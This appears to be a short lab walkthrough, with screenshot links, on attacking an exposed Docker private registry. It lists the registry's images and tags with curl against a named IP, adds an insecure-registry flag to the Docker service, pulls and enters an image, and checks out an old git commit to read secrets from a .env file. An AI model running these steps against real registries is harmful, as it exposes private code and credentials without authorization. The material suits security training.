- Understanding the API structure of the docker private registry to list of images
curl 165.22.221.65:5000/v2/_catalog
- Get the list of tags for the images
curl 165.22.221.65:5000/v2/privatecode/tags/list
data:image/s3,"s3://crabby-images/f5570/f55708cb3fab6ec61146dce0b59ade9e560c8d91" alt="List images with tags in private registry"
- Add the insecure-registry flag to download docker image at
vi /lib/systemd/system/docker.service
ExecStart=/usr/bin/dockerd -H fd:// --insecure-registry 165.22.221.65:5000
sudo systemctl daemon-reload
sudo service docker restart
- Download the image from private registry
docker pull 165.22.221.65:5000/privatecode:golang-developer-team
data:image/s3,"s3://crabby-images/c3dfa/c3dfafdabe80865c017189c801ba437aec9312e3" alt="pulling docker image"
- Enter into the container using the below command. Look for interesting file and folders
docker run --rm -it 165.22.221.65:5000/privatecode:golang-developer-team sh
cd /app
ls -la
data:image/s3,"s3://crabby-images/a48ab/a48abd4430847e5587da029a7ba3528824b40c33" alt="entering into container for analysis"
- Now look at the commit logs for git
git log
data:image/s3,"s3://crabby-images/4ff15/4ff158fa57e6b36e1907f2ed85958541bf757e22" alt="git commit logs"
- Then revert to the commit where environment variables are there. Then look for files and secrets
git checkout f17a07721ab9acec96aef0b1794ee466e516e37a
ls -la
cat .env
data:image/s3,"s3://crabby-images/486fa/486fad1cb003b37030f21534bc2f4f28c81fcef0" alt="revert and look for secrets"